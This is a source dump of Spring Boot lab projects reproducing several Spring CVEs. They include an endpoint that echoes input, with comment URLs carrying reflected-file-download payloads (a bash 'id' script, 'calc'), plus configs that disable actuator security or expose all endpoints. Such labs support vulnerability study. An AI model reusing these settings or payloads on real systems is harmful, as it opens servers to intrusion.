15 | */ 16 | 17 | package org.springframework.cloud.config.server.resource; 18 | 19 | /** 20 | * @author Dave Syer 21 | * 22 | */ 23 | public class NoSuchResourceException extends RuntimeException { 24 | 25 | public NoSuchResourceException(String string) { 26 | super(string); 27 | } 28 | 29 | } 30 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/resource/ResourceRepository.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | 17 | package org.springframework.cloud.config.server.resource; 18 | 19 | import org.springframework.core.io.Resource; 20 | 21 | /** 22 | * @author Dave Syer 23 | * 24 | */ 25 | public interface ResourceRepository { 26 | /** Returns the single Resource selected by name, profile, label and path. NOTE(review): path is presumably caller-supplied (the controller is not shown here); implementations should resolve it against the repository root and reject any result that escapes that root, the directory-traversal weakness class this lab directory (CVE-2019-3799) is named after. Confirm against the implementation. */ 27 | Resource findOne(String name, String profile, String label, String path); 28 | 29 | } 30 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/ssh/PrivateKeyIsValid.java: -------------------------------------------------------------------------------- 1 | package org.springframework.cloud.config.server.ssh; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | import javax.validation.Constraint; 8 | import javax.validation.Payload; 9 | 10 | import org.springframework.validation.annotation.Validated; 11 | 12 | /** 13 | * Type-level constraint checked by {@link PrivateKeyValidator}: beans annotated with {@link PrivateKeyIsValid} and {@link Validated} will have the constraints applied. 14 | * 15 | * @author Ollie Hughes 16 | */ 17 | @Constraint(validatedBy = PrivateKeyValidator.class) 18 | @Target(ElementType.TYPE) 19 | @Retention(RetentionPolicy.RUNTIME) 20 | public @interface PrivateKeyIsValid { 21 | String message() default "{PrivateKeyIsValid.message}"; 22 | Class[] groups() default {}; 23 | Class[] payload() default {}; 24 | } 25 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/support/CredentialException.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2013-2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 
6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | package org.springframework.cloud.config.server.support; 18 | 19 | /** 20 | * @author Don Laidlaw 21 | * 22 | */ 23 | @SuppressWarnings("serial") 24 | public class CredentialException extends RuntimeException { 25 | 26 | /** 27 | * 28 | */ 29 | public CredentialException(String message, Throwable cause) { 30 | super(message, cause); 31 | } 32 | 33 | } 34 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/support/EnvironmentRepositoryProperties.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | package org.springframework.cloud.config.server.support; 17 | 18 | /** 19 | * @author Dylan Roberts 20 | */ 21 | public interface EnvironmentRepositoryProperties { 22 | void setOrder(int order); 23 | } 24 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/resources/META-INF/spring.factories: -------------------------------------------------------------------------------- 1 | # Bootstrap components 2 | org.springframework.cloud.bootstrap.BootstrapConfiguration=\ 3 | org.springframework.cloud.config.server.bootstrap.ConfigServerBootstrapConfiguration,\ 4 | org.springframework.cloud.config.server.config.EncryptionAutoConfiguration 5 | 6 | # Application listeners 7 | org.springframework.context.ApplicationListener=\ 8 | org.springframework.cloud.config.server.bootstrap.ConfigServerBootstrapApplicationListener 9 | 10 | # Autoconfiguration 11 | org.springframework.boot.autoconfigure.EnableAutoConfiguration=\ 12 | org.springframework.cloud.config.server.config.ConfigServerAutoConfiguration,\ 13 | org.springframework.cloud.config.server.config.EncryptionAutoConfiguration 14 | 15 | org.springframework.boot.diagnostics.FailureAnalyzer=\ 16 | org.springframework.cloud.config.server.diagnostics.GitUriFailureAnalyzer 17 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/resources/configserver.yml: -------------------------------------------------------------------------------- 1 | info: 2 | component: Config Server 3 | spring: 4 | application: 5 | name: configserver 6 | autoconfigure.exclude: org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration 7 | jmx: 8 | default_domain: cloud.config.server 9 | cloud: 10 | config: 11 | server: 12 | git: 13 | uri: https://github.com/spring-cloud-samples/config-repo 14 | repos: 15 | - patterns: multi-repo-demo-* 16 | uri: https://github.com/spring-cloud-samples/config-repo 17 | 18 | server: 19 | port: 
8888 20 | management: 21 | context_path: /admin 22 | -------------------------------------------------------------------------------- /CVE-2020-5398/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.6.9/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.6.9/maven-plugin/reference/html/#build-image) 9 | 10 | -------------------------------------------------------------------------------- /CVE-2020-5398/src/main/java/com/example/demo/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class DemoApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(DemoApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2020-5398/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.address=10.128.5.250 2 | server.port=8099 3 | -------------------------------------------------------------------------------- /CVE-2020-5398/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class DemoApplicationTests 
{ 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2020-5398/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.address=10.128.5.250 2 | server.port=8099 3 | -------------------------------------------------------------------------------- /CVE-2020-5398/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5398/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2020-5398/target/classes/com/example/demo/MainController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5398/target/classes/com/example/demo/MainController.class -------------------------------------------------------------------------------- /CVE-2020-5398/target/test-classes/com/example/demo/DemoApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5398/target/test-classes/com/example/demo/DemoApplicationTests.class -------------------------------------------------------------------------------- /CVE-2020-5412/src/main/java/com/org/example/HystrixDashboardApplication.java: -------------------------------------------------------------------------------- 1 | package com.org.example; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import 
org.springframework.cloud.netflix.hystrix.dashboard.EnableHystrixDashboard; 6 | 7 | @EnableHystrixDashboard 8 | @SpringBootApplication 9 | public class HystrixDashboardApplication { 10 | 11 | public static void main(String[] args) { 12 | SpringApplication.run(HystrixDashboardApplication.class, args); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /CVE-2020-5412/src/main/resources/bootstrap.properties: -------------------------------------------------------------------------------- 1 | spring.application.name=hystrix-dashboard 2 | #spring.cloud.config.uri=http://localhost:8888 3 | server.address=10.128.5.250 4 | server.port=8099 -------------------------------------------------------------------------------- /CVE-2020-5412/src/test/java/com/org/example/HystrixDashboardApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.org.example; 2 | 3 | import org.junit.Test; 4 | import org.junit.runner.RunWith; 5 | import org.springframework.boot.test.context.SpringBootTest; 6 | import org.springframework.test.context.junit4.SpringRunner; 7 | 8 | @RunWith(SpringRunner.class) 9 | @SpringBootTest 10 | public class HystrixDashboardApplicationTests { 11 | 12 | @Test 13 | public void contextLoads() { 14 | } 15 | 16 | } 17 | -------------------------------------------------------------------------------- /CVE-2020-5412/target/classes/bootstrap.properties: -------------------------------------------------------------------------------- 1 | spring.application.name=hystrix-dashboard 2 | #spring.cloud.config.uri=http://localhost:8888 3 | server.address=10.128.5.250 4 | server.port=8099 -------------------------------------------------------------------------------- /CVE-2020-5412/target/classes/com/org/example/HystrixDashboardApplication.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5412/target/classes/com/org/example/HystrixDashboardApplication.class -------------------------------------------------------------------------------- /CVE-2020-5412/target/test-classes/com/org/example/HystrixDashboardApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5412/target/test-classes/com/org/example/HystrixDashboardApplicationTests.class -------------------------------------------------------------------------------- /CVE-2020-5421/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | CVE-2020-5421 9 | 1.0-SNAPSHOT 10 | 11 | 12 | org.springframework.boot 13 | spring-boot-starter-parent 14 | 2.1.7.RELEASE 15 | 16 | 17 | 18 | 19 | org.springframework.boot 20 | spring-boot-starter-web 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /CVE-2020-5421/src/main/java/com/org/example/SpringBootApplication.java: -------------------------------------------------------------------------------- 1 | package com.org.example; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | 5 | @org.springframework.boot.autoconfigure.SpringBootApplication 6 | public class SpringBootApplication { 7 | public static void main(String[] args) { 8 | SpringApplication.run(SpringBootApplication.class,args); 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /CVE-2020-5421/src/main/java/com/org/example/config/FilterConfig.java: -------------------------------------------------------------------------------- 1 | package com.org.example.config; 2 | 3 | import com.org.example.filter.SpringJsessionidRdfFilter; 4 | import 
org.springframework.boot.web.servlet.FilterRegistrationBean; 5 | import org.springframework.context.annotation.Bean; 6 | import org.springframework.context.annotation.Configuration; 7 | // NOTE(review): @Configuration and @Bean are commented out below, so as shown this FilterRegistrationBean is never registered and SpringJsessionidRdfFilter does not run; presumably that filter is the lab's mitigation for the ;jsessionid= path case. Confirm before relying on it. 8 | //@Configuration 9 | public class FilterConfig { 10 | // @Bean 11 | public FilterRegistrationBean registerAuthFilter() { 12 | FilterRegistrationBean registration = new FilterRegistrationBean(); 13 | registration.setFilter(new SpringJsessionidRdfFilter()); 14 | registration.addUrlPatterns("/*"); 15 | registration.setName("rdfFilter"); 16 | registration.setOrder(1); 17 | return registration; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /CVE-2020-5421/src/main/java/com/org/example/controller/TestController.java: -------------------------------------------------------------------------------- 1 | package com.org.example.controller; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.RequestMapping; 5 | import org.springframework.web.bind.annotation.ResponseBody; 6 | 7 | @Controller 8 | @RequestMapping(value = "rfd") 9 | public class TestController { 10 | // Lab endpoint for the reflected-file-download case: input() returns the request parameter unchanged as the response body, and application.properties in this module turns on suffix-pattern matching and path-extension content negotiation, so the URL's extension can influence how a browser saves the response. Outside the lab: run a patched Spring Framework, leave both settings off, and do not echo request data without a fixed Content-Type and Content-Disposition. 11 | // localhost:8080/rfd/content?content=hello 12 | // localhost:8080/rfd/;jsessionid=/content.sh?content=%23!%2Fbin%2Fbash%0Aid 13 | // localhost:8080/rfd/;jsessionid=/content.bat?content=calc 14 | @RequestMapping("content") 15 | @ResponseBody 16 | public String input(String content){ 17 | return content; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /CVE-2020-5421/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | spring.mvc.pathmatch.use-suffix-pattern=true 2 | spring.mvc.contentnegotiation.favor-path-extension=true 3 | server.address=10.128.5.250 4 | server.port=8099 --------------------------------------------------------------------------------
/CVE-2020-5421/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | spring.mvc.pathmatch.use-suffix-pattern=true 2 | spring.mvc.contentnegotiation.favor-path-extension=true 3 | server.address=10.128.5.250 4 | server.port=8099 -------------------------------------------------------------------------------- /CVE-2020-5421/target/classes/com/org/example/SpringBootApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5421/target/classes/com/org/example/SpringBootApplication.class -------------------------------------------------------------------------------- /CVE-2020-5421/target/classes/com/org/example/config/FilterConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5421/target/classes/com/org/example/config/FilterConfig.class -------------------------------------------------------------------------------- /CVE-2020-5421/target/classes/com/org/example/controller/TestController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5421/target/classes/com/org/example/controller/TestController.class -------------------------------------------------------------------------------- /CVE-2020-5421/target/classes/com/org/example/filter/SpringJsessionidRdfFilter.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2020-5421/target/classes/com/org/example/filter/SpringJsessionidRdfFilter.class 
-------------------------------------------------------------------------------- /CVE-2021-21234/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM openjdk:8-jdk-alpine 2 | MAINTAINER baeldung.com 3 | COPY target/spring-boot-hello-world-example-0.0.1-SNAPSHOT.jar app.jar 4 | ENTRYPOINT ["java","-jar","/app.jar"] 5 | EXPOSE 8887 6 | RUN mkdir -p ~/sping.log -------------------------------------------------------------------------------- /CVE-2021-21234/src/main/java/com/boraji/tutorial/springboot/MainApp.java: -------------------------------------------------------------------------------- 1 | package com.boraji.tutorial.springboot; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class MainApp { 8 | public static void main(String[] args) { 9 | SpringApplication.run(MainApp.class, args); 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /CVE-2021-21234/src/main/java/com/boraji/tutorial/springboot/controller/HelloWorldController.java: -------------------------------------------------------------------------------- 1 | package com.boraji.tutorial.springboot.controller; 2 | 3 | import org.springframework.web.bind.annotation.RequestMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | 6 | @RestController 7 | public class HelloWorldController { 8 | @RequestMapping("/") 9 | public String sayHello() { 10 | return "Hello Spring Boot!!"; 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /CVE-2021-21234/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8887 2 | logging.path=spring.log 3 | endpoints.actuator.enabled=true 4 | management.context-path=/manage 5 | 
management.security.enabled=false -------------------------------------------------------------------------------- /CVE-2021-21234/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8887 2 | logging.path=spring.log 3 | endpoints.actuator.enabled=true 4 | management.context-path=/manage 5 | management.security.enabled=false -------------------------------------------------------------------------------- /CVE-2021-21234/target/classes/com/boraji/tutorial/springboot/MainApp.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2021-21234/target/classes/com/boraji/tutorial/springboot/MainApp.class -------------------------------------------------------------------------------- /CVE-2021-21234/target/classes/com/boraji/tutorial/springboot/controller/HelloWorldController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2021-21234/target/classes/com/boraji/tutorial/springboot/controller/HelloWorldController.class -------------------------------------------------------------------------------- /CVE-2021-22053/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/#build-image) 9 | * [Eureka 
Server](https://docs.spring.io/spring-cloud-netflix/docs/current/reference/html/#spring-cloud-eureka-server) 10 | 11 | ### Guides 12 | The following guides illustrate how to use some features concretely: 13 | 14 | * [Service Registration and Discovery with Eureka and Spring Cloud](https://spring.io/guides/gs/service-registration-and-discovery/) 15 | 16 | -------------------------------------------------------------------------------- /CVE-2021-22053/src/main/java/com/example/demo/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.cloud.netflix.hystrix.dashboard.EnableHystrixDashboard; 6 | 7 | @EnableHystrixDashboard 8 | @SpringBootApplication 9 | public class DemoApplication { 10 | 11 | public static void main(String[] args) { 12 | SpringApplication.run(DemoApplication.class, args); 13 | } 14 | 15 | } 16 | -------------------------------------------------------------------------------- /CVE-2021-22053/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.address=10.128.5.250 2 | server.port=8099 3 | -------------------------------------------------------------------------------- /CVE-2021-22053/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class DemoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2021-22053/target/classes/application.properties: 
-------------------------------------------------------------------------------- 1 | server.address=10.128.5.250 2 | server.port=8099 3 | -------------------------------------------------------------------------------- /CVE-2021-22053/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2021-22053/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2021-22053/target/test-classes/com/example/demo/DemoApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2021-22053/target/test-classes/com/example/demo/DemoApplicationTests.class -------------------------------------------------------------------------------- /CVE-2022-22947/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/#build-image) 9 | * [Gateway](https://docs.spring.io/spring-cloud-gateway/docs/current/reference/html/) 10 | 11 | ### Guides 12 | The following guides illustrate how to use some features concretely: 13 | 14 | * [Using Spring Cloud Gateway](https://github.com/spring-cloud-samples/spring-cloud-gateway-sample) 15 | 16 | -------------------------------------------------------------------------------- 
/CVE-2022-22947/src/main/java/com/example/demo/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.cloud.gateway.route.RouteLocator; 6 | import org.springframework.cloud.gateway.route.builder.RouteLocatorBuilder; 7 | import org.springframework.context.annotation.Bean; 8 | import org.springframework.web.bind.annotation.RequestMapping; 9 | import org.springframework.web.bind.annotation.RestController; 10 | /** Minimal Spring Cloud Gateway application used as the lab target: one root handler and two routes declared in code. */ 11 | @SpringBootApplication 12 | @RestController 13 | public class DemoApplication { 14 | 15 | @RequestMapping("/") 16 | public String root() { 17 | return "Gateway Up and Running!"; 18 | } 19 | // Declares the "test" and "get" routes. NOTE(review): the rewritePath pattern is shown as "/test(?.*)" while the replacement uses ${path}; the named group (?<path>.*) was presumably lost when this page was rendered, so confirm against the repository before copying. 20 | @Bean 21 | RouteLocator testRouteLocator(RouteLocatorBuilder routeLocatorBuilder) { 22 | return routeLocatorBuilder.routes() 23 | .route("test", r -> r.path("/test/**").filters(f -> f.rewritePath("/test(?.*)", "/${path}")).uri("https://www.google.com")) 24 | .route("get", r -> r.path("/get/**").filters(f -> f.addRequestHeader("X-Gateway-Test", "Foo")).uri("https://httpbin.org")).build(); 25 | } 26 | 27 | public static void main(String[] args) { 28 | SpringApplication.run(DemoApplication.class, args); 29 | } 30 | 31 | } 32 | -------------------------------------------------------------------------------- /CVE-2022-22947/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | spring.application.name=gateway-demo 2 | server.port=9000 3 | server.address=10.128.5.250 4 | management.endpoint.gateway.enabled=true 5 | management.endpoints.web.exposure.include=gateway 6 | # Lab setting: the two management.* lines above enable the gateway actuator endpoint and expose it over HTTP, and no access control for it is configured in this module. Outside this reproduction keep the endpoint unexposed or behind authentication and run a patched Spring Cloud Gateway. 7 | #management.endpoints.web.exposure.exclude="*" 8 | #spring.cloud.gateway.routes-id=index 9 | #spring.cloud.gateway.routes-uri=http://example.com 10 | 
#spring.cloud.gateway.routes-predicates=Method=GET 11 | -------------------------------------------------------------------------------- /CVE-2022-22947/src/main/resources/application.yaml: -------------------------------------------------------------------------------- 1 | #spring: 2 | # cloud: 3 | # gateway: 4 | # routes: 5 | # - id: after_route 6 | # uri: https://example.org 7 | # predicates: 8 | # - Cookie=mycookie,mycookievalue 9 | 10 | #spring: 11 | # cloud: 12 | # gateway: 13 | # routes: 14 | # - id: after_route 15 | # uri: https://example.org 16 | # predicates: 17 | # - name: Cookie 18 | # args: 19 | # name: mycookie 20 | # regexp: mycookievalue 21 | # 22 | management: 23 | endpoints: 24 | web: 25 | exposure: 26 | include: "*" 27 | 28 | spring: 29 | cloud: 30 | gateway: 31 | routes: 32 | - id: index 33 | uri: http://example.com 34 | predicates: 35 | - Method=GET -------------------------------------------------------------------------------- /CVE-2022-22947/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class DemoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2022-22947/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | spring.application.name=gateway-demo 2 | server.port=9000 3 | server.address=10.128.5.250 4 | management.endpoint.gateway.enabled=true 5 | management.endpoints.web.exposure.include=gateway 6 | 7 | #management.endpoints.web.exposure.exclude="*" 8 | #spring.cloud.gateway.routes-id=index 9 | #spring.cloud.gateway.routes-uri=http://example.com 10 | #spring.cloud.gateway.routes-predicates=Method=GET 
11 | -------------------------------------------------------------------------------- /CVE-2022-22947/target/classes/application.yaml: -------------------------------------------------------------------------------- 1 | #spring: 2 | # cloud: 3 | # gateway: 4 | # routes: 5 | # - id: after_route 6 | # uri: https://example.org 7 | # predicates: 8 | # - Cookie=mycookie,mycookievalue 9 | 10 | #spring: 11 | # cloud: 12 | # gateway: 13 | # routes: 14 | # - id: after_route 15 | # uri: https://example.org 16 | # predicates: 17 | # - name: Cookie 18 | # args: 19 | # name: mycookie 20 | # regexp: mycookievalue 21 | # 22 | management: 23 | endpoints: 24 | web: 25 | exposure: 26 | include: "*" 27 | 28 | spring: 29 | cloud: 30 | gateway: 31 | routes: 32 | - id: index 33 | uri: http://example.com 34 | predicates: 35 | - Method=GET -------------------------------------------------------------------------------- /CVE-2022-22947/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22947/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2022-22947/target/test-classes/com/example/demo/DemoApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22947/target/test-classes/com/example/demo/DemoApplicationTests.class -------------------------------------------------------------------------------- /CVE-2022-22963/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven 
documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/#build-image) 9 | * [Function](https://docs.spring.io/spring-cloud-function/docs/current/reference/html/spring-cloud-function.html) 10 | 11 | ### Additional Links 12 | These additional references should also help you: 13 | 14 | * [Various sample apps using Spring Cloud Function](https://github.com/spring-cloud/spring-cloud-function/tree/main/spring-cloud-function-samples) 15 | 16 | -------------------------------------------------------------------------------- /CVE-2022-22963/src/main/java/com/example/demo/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class DemoApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(DemoApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2022-22963/src/main/java/com/example/demo/TestController.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.web.bind.annotation.RequestMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | 6 | @RestController 7 | public class TestController { 8 | @RequestMapping("/") 9 | String home() { 10 | return "hello axisx"; 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /CVE-2022-22963/src/main/resources/application.properties: 
-------------------------------------------------------------------------------- 1 | server.address=10.128.5.250 2 | server.port=8089 3 | -------------------------------------------------------------------------------- /CVE-2022-22963/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class DemoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2022-22963/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.address=10.128.5.250 2 | server.port=8089 3 | -------------------------------------------------------------------------------- /CVE-2022-22963/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22963/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2022-22963/target/classes/com/example/demo/TestController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22963/target/classes/com/example/demo/TestController.class -------------------------------------------------------------------------------- /CVE-2022-22963/target/test-classes/com/example/demo/DemoApplicationTests.class: -------------------------------------------------------------------------------- 
